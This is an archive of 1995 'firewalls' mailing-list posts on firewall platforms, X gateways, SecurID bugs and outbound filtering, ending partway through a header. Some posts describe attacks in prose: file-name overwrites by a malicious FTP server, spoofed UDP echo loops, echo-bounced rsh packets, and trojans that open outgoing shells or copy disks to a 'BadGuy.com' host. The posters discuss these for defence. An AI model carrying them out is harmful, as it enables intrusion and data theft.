zeus (8.6.9/8.6.5) with ESMTP id PAA09216 for ; Wed, 17 May 1995 15:05:18 -0400 Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 15:10:23 +1100 Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 15:09:38 +1100 From: "ANNA M. KING" Organization: New York State Insurance Fund To: firewalls@GreatCircle.com Date: Wed, 17 May 1995 15:09:31 EST Subject: Re: Packet filtering for NT firewall Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > And watch out about sending 3000 or so extra lines in your messages :-) > > Regards, > Mike Sorry about the extra lines. And thanks for the rapid and helpful responses. -Anna From firewalls-owner Wed May 17 13:43:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25664 for firewalls-outgoing; Wed, 17 May 1995 12:55:23 -0700 Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA25659 for ; Wed, 17 May 1995 12:55:18 -0700 Received: from hpindda.cup.hp.com by hp.com with ESMTP (1.37.109.15/15.5+ECS 3.3) id AA240710491; Wed, 17 May 1995 12:54:51 -0700 Received: from localhost by hpindda.cup.hp.com with SMTP (1.37.109.15/15.5+IOS 3.20+cup+OMrelay) id AA138250455; Wed, 17 May 1995 12:54:15 -0700 Message-Id: <199505171954.AA138250455@hpindda.cup.hp.com> To: Adam Safier Cc: firewalls@GreatCircle.COM, smith@sctc.com Subject: Re: Why control outbound traffic? In-Reply-To: Your message of "Wed, 17 May 1995 13:38:41 EDT." Date: Wed, 17 May 1995 12:54:15 -0700 From: Abraham Lui Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | > >1. No. There is not a security problem with allowing unrestricted | outgoing | > >traffic [from a technical perspective]. | > | > It all depends on what you mean by "unrestricted" and what you mean by | > "a technical perspective." | > | > Further restrictions reduce the organization's window of vulnerability | > to more sophisticated technical attacks, as Andrew Molitor pointed | > out. | | In theory users could run X-Terminal protocol through the firewall. | Since their workstation is the "Server" the outside "Client" could | request keystrokes, function key presses etc. I've done it in house with | "dumb" terminals and termial emulator scripts (before I knew there was | somthing more than hays modems). I don't see why that attack would not | work with X-Terms. | | I suggest cutting off outgoing X-Term traffic. | | Do any sites actually allow outsiders to run custom X-Windows applications? | | 2c worth. | Adam TIS provides a X-gw which allows the owner of the x-server to allow or deny the connection request from a Xclient sitting outside the firewall. This provides "some" protection. Abraham +-------------------------------------------+---------------------------------+ |Abraham Lui (Member, Technical Staff) |Bldg: 43L; MS 43LM; Pillar P7 | |Information Networks Division |Phone: 408-447-2403 | |Hewlett-Packard Company |Telnet: 1-447-2403 | |19420 Homestead Road, MS 43LM |Fax: 408-447-3660 | |Cupertino, CA 95014-9807 |Email: abraham@cup.hp.com | +-------------------------------------------+---------------------------------+ From firewalls-owner Wed May 17 13:48:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26276 for firewalls-outgoing; Wed, 17 May 1995 13:14:41 -0700 Received: from isis.u-strasbg.fr (isis.u-strasbg.fr [130.79.200.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26260 for ; Wed, 17 May 1995 13:14:33 -0700 Received: from des3.u-strasbg.fr (des3.u-strasbg.fr [130.79.7.62]) by isis.u-strasbg.fr (8.6.9/8.6.9) with SMTP id WAA11068 for ; Wed, 17 May 1995 22:12:28 +0200 Received: by des3.u-strasbg.fr (4.1/SMI-3.2-jjp/4/6/92) id AA07071; Wed, 17 May 95 22:11:10 +0100 Date: Wed, 17 May 95 22:11:10 +0100 From: detzel@des3.u-strasbg.fr (???) Message-Id: <9505172111.AA07071@des3.u-strasbg.fr> To: firewalls@GreatCircle.COM Subject: Re: Malicious Servers. Do clients guard against? (FTP example) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Eric.Salome@siege.cnes.fr wrote: >You might be cautious enought to get the files, being in your /var/tmp >directory. >But what happens if my ftp server generate, in response to your mget >command, among many named.* file names, a "/etc/passwd" file name ? >(I can even be more subtle than just rewriting your /etc/passd file). >Would it work ? I think it will. But if you use ftp from FWTK (which issues a chroot) it won't hurt anything in this case. Am I right ? From firewalls-owner Wed May 17 14:07:23 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26315 for firewalls-outgoing; Wed, 17 May 1995 13:15:39 -0700 Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26309 for ; Wed, 17 May 1995 13:15:35 -0700 Message-Id: <199505172015.OAA22959@ncar.ucar.EDU> Received: by ncar.ucar.EDU (NCAR-local/ NCAR Central Post Office 03/11/93) id OAA22959; Wed, 17 May 1995 14:15:08 -0600 Subject: Re: ACE SecureID Flaw (SunOS 4.1.x) To: len@NETSYS.COM (Len Rose) Date: Wed, 17 May 95 14:15:07 MDT Cc: firewalls@GreatCircle.COM In-Reply-To: <9505170303.ZM272@death.netsys.com>; from "Len Rose" at May 17, 95 3:03 am From: woods@ncar.ucar.edu (Greg Woods) X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone noted that ACE has linked their code against /usr/5lib/libc.so.2.9, > which unfortunately has the braindead resolver (NIS/hosts)? This has critical > ramifications for anyone who is smart enough to avoid NIS within/without > their networks. That probably explains another problem I have encountered with ACE. If your client is multi-homed, it flat out won't work (always says "Access denied" and the log messages show "PRN incorrect" as if the wrong passcode had been entered). Were it not for the TIS authentication server, we'd be up the creek without a paddle. (Instead of assigning users sdshell, I used login-sh, and then as far as ACE is concerned the client is the machine running the authentication server rather than the machine the user is trying to get access to). > Unfortunately when I tried to explain the ramifications of this to their > tech support folks, they didn't seem to understand why it was a problem. They are aware that the client code has problems on multi-homed hosts, but the people you get to on the phone (even after they connect you to an "engineer") have no clue as to why or how to work around it. > They need to get with the program and link against the real resolver > routines in libc.so.1.9.x that use BIND (or at least offer 2 versions of > the binaries) Yes. Please. All the hosts that are going to be part of our firewall are multi-homed and those are the ones we need secure access to! --Greg From firewalls-owner Wed May 17 14:32:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA26753 for firewalls-outgoing; Wed, 17 May 1995 13:30:56 -0700 Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA26748 for ; Wed, 17 May 1995 13:30:52 -0700 Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id QAA23803 for ; Wed, 17 May 1995 16:29:27 -0400 Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id sma023797; Wed May 17 16:29:12 1995 Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id QAA09925 for ; Wed, 17 May 1995 16:24:29 -0400 Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 16:29:01 +1100 Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 16:28:40 +1100 From: "ANNA M. KING" Organization: New York State Insurance Fund To: firewalls@GreatCircle.com Date: Wed, 17 May 1995 16:28:35 EST Subject: Re: Packet filtering for NT firewall Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wednesday 17 May Mike Murphy said: > >I am setting up an NT firewall to direct traffic from some other > >network, the firewall will be connected to a CISCO router with > >multiple serial ports connected to multiple networks of various > >types, to a particular machine ( mainframe or application server). > >What I need is packet filtering software. Any suggestions about what > >is best would be appreciated. > > Dump NT, get FreeBSD, NetBSD, or BSDI, and run TIS FWTK > on it with IPFILTER packet filtering. > Maybe firewall isn't what I have in mind. The NT machine will have two purposes; as suggested by others the CISCO router will do the packet filtering, but I need to log who is accessing our network and use it as a possible mailhub to route email to whoever is attached to us through the routers. Unix seems to me to be overkill. > And watch out about sending 3000 or so extra lines in your messages :-) > Sorry about, must have fallen asleep. Regards, Anna From firewalls-owner Wed May 17 14:38:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27213 for firewalls-outgoing; Wed, 17 May 1995 13:48:32 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27206 for ; Wed, 17 May 1995 13:48:28 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id QAA06620; Wed, 17 May 1995 16:43:02 -0400 Date: Wed, 17 May 1995 16:43:01 -0400 (EDT) From: David Miller Subject: Re: Requesting "echo" To: eav1001@Umoncton.CA cc: firewalls@greatcircle.com In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 May 1995 eav1001@Umoncton.CA wrote: > > > On Wed, 17 May 1995, Jean-Christophe Touvet wrote: > > > > Not blocking the echo port (port 7) or somehow preventing packets with > > > spoofed IP addresses from entering the system could be even more > > > disasterous to a site. Consider this scenario: > > > > > > A packet enters the network with a spoofed IP address (say of the > > > backup server), with source port 514 (port for remote shell), and the > > > payload consisting of a valid RSH-type "header" and content. This > > > packet then gets echoed back to the backup server with the IP source > > > address of the client. If the server trusts this host (and most > > > backup hosts must, so remote dumps can happen), then what? > > > > Hmm, I'm not sure it would be such easy with TCP services. > > > > But there is at least one very annoying attack with UDP echo: send a spoofed > > UDP packet with both source and destination port=7. Guess what ? > > ^^^^^^^^^^ > > -JCT- > > > > what to guess ? > would you, guys, give more explanations please ? The packet would drive the machine nuts. The system would keep sending itself "please send me an echo message". > > Also, > what is a spoofed UDP packet ? A packet that has the wrong source address in it. In this case, the source address would be the same as the destination address and equal to the target system, as opposed to having the source address of the machine it actually originated on. > > Thank you and hava gooday...! > Uh, guys? I think we're leaving the firewalls topic behind. If anyone really wants to continue this discussion, take it to bugtraq or something. Thanks ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Wed May 17 15:04:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29456 for firewalls-outgoing; Wed, 17 May 1995 14:56:05 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29449 for ; Wed, 17 May 1995 14:56:01 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id SAA27036 for ; Wed, 17 May 1995 18:04:49 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma027032; Wed May 17 18:04:27 1995 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id RAA05521 for ; Wed, 17 May 1995 17:58:57 -0400 From: Michael Richardson Received: by metis.milkyway.com (8.6.9/BSDI-Client) id RAA04005; Wed, 17 May 1995 17:54:03 -0400 Date: Wed, 17 May 1995 17:54:03 -0400 Message-Id: <199505172154.RAA04005@metis.milkyway.com> To: firewalls@greatcircle.com Subject: Re: Why control outbound traffic? Newsgroups: milkyway.mail.firewalls In-Reply-To: <199505171954.AA138250455@hpindda.cup.hp.com> References: Organization: Milkyway Networks Corporation Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <199505171954.AA138250455@hpindda.cup.hp.com> you write: >| In theory users could run X-Terminal protocol through the firewall. >| Since their workstation is the "Server" the outside "Client" could >| request keystrokes, function key presses etc. I've done it in >TIS provides a X-gw which allows the owner of the x-server to allow >or deny the connection request from a Xclient sitting outside the >firewall. This provides "some" protection. No, it provides no protection because the X server is on the bad guy's desk. As several others have pointed out, you restrict outgoing traffic, and often even authenticate users before they are allowed out because if an internal host is convinced to run some trojan code (%) it can simply start an outgoing connection, execv("/bin/sh") on the port, and the bad guy waits with accept(2). All of the recent sendmail, httpd, unpatched plexus (with perl5), etc.. holes that have surfaced in the past several years were of the "get this code to run" variety. If this kind of thing worries you then you need an application layer firewall not a router with "established" stuff. (%) I'm waiting for a DOS/Windows/Mac virus/trojan that does *nothing* to machines until it sees WinSock or MacTCP active, then it copies your hard disk to BadGuy.com, probably using FSP on port 53. -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Wed May 17 15:32:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00365 for firewalls-outgoing; Wed, 17 May 1995 15:18:09 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA00360 for ; Wed, 17 May 1995 15:18:04 -0700 Message-Id: <199505172218.PAA00360@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA273159149; Thu, 18 May 1995 08:19:09 +1000 From: Darren Reed Subject: Re: Packet filtering for NT firewall To: AMK@dssvr1.sif.state.ny.us (ANNA M. KING) Date: Thu, 18 May 1995 08:19:09 +1000 (EST) Cc: firewalls@GreatCircle.com In-Reply-To: from "ANNA M. KING" at May 17, 95 04:28:35 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1578 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from ANNA M. KING, they said: > > On Wednesday 17 May Mike Murphy said: > > > >I am setting up an NT firewall to direct traffic from some other > > >network, the firewall will be connected to a CISCO router with > > >multiple serial ports connected to multiple networks of various > > >types, to a particular machine ( mainframe or application server). > > >What I need is packet filtering software. Any suggestions about what > > >is best would be appreciated. > > > > Dump NT, get FreeBSD, NetBSD, or BSDI, and run TIS FWTK > > on it with IPFILTER packet filtering. > > > Maybe firewall isn't what I have in mind. The NT machine will have > two purposes; as suggested by others the CISCO router will do the packet > filtering, but I need to log who is accessing our network and use it > as a possible mailhub to route email to whoever is attached to us through > the routers. Unix seems to me to be overkill. You need to look at what you're doing here. Unix does what you want very easily and if you're using any of the above you have a large amount of control over your system. The cost is finding someone who can set this up for you if you can't. NT is all blackbox material. I suspect that unless you're someone called Microsoft, you would have no chance of writing firewall s/w for NT. Unix doesn't have to be something you run on "big" computers and it is going to provide you with everything you need to do what you need. I'd be more inclined to say that in situations like firewalls, NT just isn't an appropriate solution. darren From firewalls-owner Wed May 17 16:01:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01508 for firewalls-outgoing; Wed, 17 May 1995 15:59:32 -0700 Received: from netcom23.netcom.com (netcom23.netcom.com [192.100.81.137]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01501 for ; Wed, 17 May 1995 15:59:27 -0700 Received: by netcom23.netcom.com (8.6.12/Netcom) id PAA05315; Wed, 17 May 1995 15:58:28 -0700 From: okuyama@netcom.com (Darin Okuyama) Message-Id: <199505172258.PAA05315@netcom23.netcom.com> Subject: building x-gw .. To: firewalls@greatcircle.com (Firewall Mailing List) Date: Wed, 17 May 1995 15:58:27 -0700 (PDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 375 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and I get the following error: cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \ -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv ld: Undefined symbol _get_wmShellWidgetClass _get_applicationShellWidgetClass Am I missing a library? Or are they in the wrong order? ---Darin OKuyama From firewalls-owner Wed May 17 16:23:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01069 for firewalls-outgoing; Wed, 17 May 1995 15:47:47 -0700 Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01064 for ; Wed, 17 May 1995 15:47:43 -0700 Received: from hpindda.cup.hp.com by hp.com with ESMTP (1.37.109.15/15.5+ECS 3.3) id AA164200843; Wed, 17 May 1995 15:47:23 -0700 Received: from localhost by hpindda.cup.hp.com with SMTP (1.37.109.15/15.5+IOS 3.20+cup+OMrelay) id AA003930806; Wed, 17 May 1995 15:46:46 -0700 Message-Id: <199505172246.AA003930806@hpindda.cup.hp.com> To: Michael Richardson Cc: firewalls@GreatCircle.COM Subject: Re: Why control outbound traffic? In-Reply-To: Your message of "Wed, 17 May 1995 17:54:03 EDT." <199505172154.RAA04005@metis.milkyway.com> Date: Wed, 17 May 1995 15:46:46 -0700 From: Abraham Lui Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | >TIS provides a X-gw which allows the owner of the x-server to allow | >or deny the connection request from a Xclient sitting outside the | >firewall. This provides "some" protection. | | No, it provides no protection because the X server is on the bad | guy's desk. This is only half true. The TIS X-gw can control traffic on either direction. The Xserver is NOT necessary on the bad guy's desk. Abe +-------------------------------------------+---------------------------------+ |Abraham Lui (Member, Technical Staff) |Bldg: 43L; MS 43LM; Pillar P7 | |Information Networks Division |Phone: 408-447-2403 | |Hewlett-Packard Company |Telnet: 1-447-2403 | |19420 Homestead Road, MS 43LM |Fax: 408-447-3660 | |Cupertino, CA 95014-9807 |Email: abraham@cup.hp.com | +-------------------------------------------+---------------------------------+ From firewalls-owner Wed May 17 17:26:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02570 for firewalls-outgoing; Wed, 17 May 1995 16:42:13 -0700 Received: from Disclosure.COM (di.disclosure.com [199.97.230.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA02563 for ; Wed, 17 May 1995 16:42:08 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA15380; Wed, 17 May 95 19:43:58 EDT Date: Wed, 17 May 1995 19:43:57 -0400 (EDT) From: Scott Barman To: Darin Okuyama Cc: Firewall Mailing List Subject: Re: building x-gw .. In-Reply-To: <199505172258.PAA05315@netcom23.netcom.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 May 1995, Darin Okuyama wrote: > > I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and > I get the following error: > > cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \ > -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv > > ld: Undefined symbol > _get_wmShellWidgetClass > _get_applicationShellWidgetClass > > Am I missing a library? Or are they in the wrong order? I think you are missing a library. If I remember back to my Motif programming days, I think those are specific to Motif. To get those you need "-lXm" on the command line--but you don't have the libXm.a (Motif) libraries since you're running OpenWindoze (and Sun is supposed to be CDE compilant! yea... right!). You may have to do some hackin'! I've never built FWTK's x-gw on a Sun. I wonder if these are required? Just did a quick perusal of the OW libraries (using nm under SunOS 4.1.3_U1). They are not there. That *almost* confirms to me they are from Motif. Good luck! scott barman scott@disclosure.com From firewalls-owner Wed May 17 17:32:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03423 for firewalls-outgoing; Wed, 17 May 1995 17:16:04 -0700 Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA03418 for ; Wed, 17 May 1995 17:16:00 -0700 Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id UAA28946 for ; Wed, 17 May 1995 20:14:34 -0400 Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id sma028936; Wed May 17 20:13:41 1995 Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id UAA11624 for ; Wed, 17 May 1995 20:11:23 -0400 Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 20:16:28 +1100 Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 20:15:56 +1100 From: "ANNA M. KING" Organization: New York State Insurance Fund To: firewalls@GreatCircle.com Date: Wed, 17 May 1995 20:15:52 EST Subject: Re: Packet filtering for NT firewall Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Wed, 17 May 1995, SCOTT BARMAN wrote: > Is Unix overkill becuase you don't know it or because you're mandated > to use NT? This is in no way a cut down, but understanding your > situation may help in giving advice. > No it's not a mandate that I use NT or that I am unfamiliar with Unix, I have set a firewall between my network and the Internet on a SUN Sparc20 all software obtained from off the network. If this only involves just my network I would stick with Unix, but I am also suppose to help the other side set up a similar configuration; firewall, CISCO router, etc. They are not familiar with Unix and complaint about not having the time and resources to learn a new OS, also they would like this project completed in approximately a month's time. > The Fact of the matter is there is nothing out there for NT to use in > this matter. The concept of proxy servers, filters, and screeners, > which is what you will need to do monitoring, etc., does not exist in > this world. Even M$ does not have it--and I asked. > > If you find something, I would be interested in hearing about it since > my customers are interested. However, until NT grows up and becomes > a real operating system, I just don't see this as a part of that system. > Sorry. This being the case after looking around for the last couple weeks, I have no choice but to go with a Unix solution. Since I am familiar with Linux I'll probably use that. Thanks for the info. If I ever find something I'll let you know. Anna M. King, Sr. Programmer/Analyst New York State Insurance Fund amk@ds_svr1.sif.state.ny.us (212) 312-9005 From firewalls-owner Wed May 17 17:54:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02507 for firewalls-outgoing; Wed, 17 May 1995 16:41:02 -0700 Received: from s5.math.umn.edu (s5.math.umn.edu [128.101.154.105]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA03561 for ; Tue, 16 May 1995 19:02:52 -0700 From: riordan@math.umn.edu Received: from erasmus.math.umn.edu by s5.math.umn.edu; Tue, 16 May 1995 21:02:27 -0500 Date: Tue, 16 May 1995 21:02:10 -0500 Message-Id: <199505170202.VAA02966@erasmus.math.umn.edu> Received: by erasmus.math.umn.edu; Tue, 16 May 1995 21:02:10 -0500 To: firewalls@greatcircle.com Subject: Re: Monitoring outgoing traffi Reply-to: riordan@geom.umn.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ron DuFresne says: > A company ploicy that outlines how sensitive data is to be > transmitted, good user training, and a strongly skilled user help > desk/support department are the keys to keeping sensitive data out of > the hands of those it is ment not for...not a 'big-brother' mentality. I do not know about settings other than academia but.. here it is often the case sensitive data are often leaked as a result of incorrectly exported insensitive data. I supposed that while monitoring out going traffic for deliberately and maliciously exported data would be infeasible, that such monitor might reduce the number of accidental breaches. As a tangent I tend to worry about imported data. I do not find many people really think the methods associated with various data formats. I do not think that, as examples, that TeX and Postscript are generally regarded full languages w/ file io that they are. I am scared even to think about Morris/fingerd type attacks on other data formats. No firewall is going to prevent users from accidentally opening holes by not anticipating the result of some configuration issue. I do not think it is even an issue of being naive: how often have we found a gaping new sendmail hole? regards, -- james riordan@geom.umn.edu http://www.math.umn.edu/~riordan From firewalls-owner Wed May 17 18:37:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04506 for firewalls-outgoing; Wed, 17 May 1995 18:07:50 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA04501 for ; Wed, 17 May 1995 18:07:46 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id SAA01010; Wed, 17 May 1995 18:04:51 -0700 Received: from ilinx(192.197.176.225) by tera via smap (V1.3) id sma001008; Wed May 17 18:04:35 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Wed, 17 May 95 18:02 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) To: avalon@coombs.anu.edu.au Subject: Re[2]: Packet filtering for NT firewall Cc: AMK@dssvr1.sif.state.ny.us, firewalls@GreatCircle.com Date: Wed, 17 May 1995 18:02:25 -0700 (PDT) MIME-Version: 1.0 X-Mailer: Ishmail 1.0.5-386-950210 Available via anonymous ftp from ftp.halsoft.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of Darren Reed on scroll <199505172218.PAA00360@miles.greatcircle.com> > NT is all blackbox material. I suspect that unless you're someone > called Microsoft, you would have no chance of writing firewall s/w > for NT. I agree completely. There a few other things about NT for firewalls that bothers me. First, there aren't enough out there in high-profile sites for me to believe that it's been water-tested yet. The last thing I want is to be known for the first NT firewall on the 'net to be broken into. Second, NT is a single vendor solution. When a security bug is found in UNIX there is motivation to disclose it to the market. The vendor that finds, fixes and announces it first looks better than the rest for finding it and he must be quick about it so as not to get skunked by the other UNIX vendors. That type of competitive motivation just does not exist in the NT market. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Wed May 17 19:00:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA04520 for firewalls-outgoing; Wed, 17 May 1995 18:09:30 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id SAA04508 for ; Wed, 17 May 1995 18:09:13 -0700 Received: from lordmuck.itd.uts.edu.au. by sequoia.itd.uts.EDU.AU with SMTP id AA07586 (5.65c/IDA-1.4.4 for ); Thu, 18 May 1995 11:08:32 +1000 Received: (from matt@localhost) by lordmuck.itd.uts.edu.au. (8.6.12/Jas 1.1) id LAA29280; Thu, 18 May 1995 11:08:49 +1000 From: Jas (Matthew K) Message-Id: <199505180108.LAA29280@lordmuck.itd.uts.edu.au.> Subject: Re: building x-gw .. To: scott@disclosure.com (Scott Barman) Date: Thu, 18 May 1995 11:08:48 +1000 (EST) Cc: okuyama@netcom.com, firewalls@greatcircle.com In-Reply-To: from "Scott Barman" at May 17, 95 07:43:57 pm X-Gc: GCV 2.1 GAT/M/CS d--(-+) H-- s++:-- g+ p? !au a-(?) w+++ v+ C+++$ X-Gc: UVS++++$ P+>+++ L- 3+++ E-(++) N++ K W--- M+ V-- -po+(+) Y+ t+ X-Gc: !5++ jx R+ G? !tv b+++ D++ B e+ u--(**) h- f+(*) r n- !y X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 416 5722 X-Pager: +61 2 214 1111 #849482 X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1703 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Scott Barman wrote this... > > On Wed, 17 May 1995, Darin Okuyama wrote: > > > > I am trying to build "x-gw" on a Sun running SunOS 4.1.3, and > > I get the following error: > > > > cc -g -o x-gw x-gw.o ../libfwall.a ulib.a -L/usr/openwin/lib \ > > -lXaw -lXmu -lXt -lXext -lX11 -lX -lm -lresolv > > > > ld: Undefined symbol > > _get_wmShellWidgetClass > > _get_applicationShellWidgetClass > > > > Am I missing a library? Or are they in the wrong order? > > I think you are missing a library. If I remember back to my Motif > programming days, I think those are specific to Motif. To get those > you need "-lXm" on the command line--but you don't have the libXm.a > (Motif) libraries since you're running OpenWindoze (and Sun is > supposed to be CDE compilant! yea... right!). You may have to do > some hackin'! > > I've never built FWTK's x-gw on a Sun. I wonder if these are required? > just thought i'd drop in this point here, so no more misconceptions float around on this matter. it is a bug in the dynamic loader that causes this bug from memory.. it is not a problem with Motif or Openlook or anything.. the sunos faq should have a work around for this, i cant remeber the exact semantics of it, but basically it involves statically linking instead of dynamic linking.. Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Wed May 17 19:08:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA05025 for firewalls-outgoing; Wed, 17 May 1995 18:30:43 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.84.252]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA05020 for ; Wed, 17 May 1995 18:30:39 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id UAA22615 for GreatCircle.COM!firewalls; Wed, 17 May 1995 20:09:36 -0500 Received: by ris1.nmti.com (smail2.5) id AA07884; 17 May 95 18:33:10 CDT (Wed) Received: by sonic.nmti.com; id AA13658; Wed, 17 May 1995 18:54:29 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9505172354.AA13658@sonic.nmti.com.nmti.com> Subject: Re: Malicious Servers. Do clients guard against? (FTP example) To: isdmill@gatekeeper.ddp.state.me.us (David Miller) Date: Wed, 17 May 1995 18:54:28 -0500 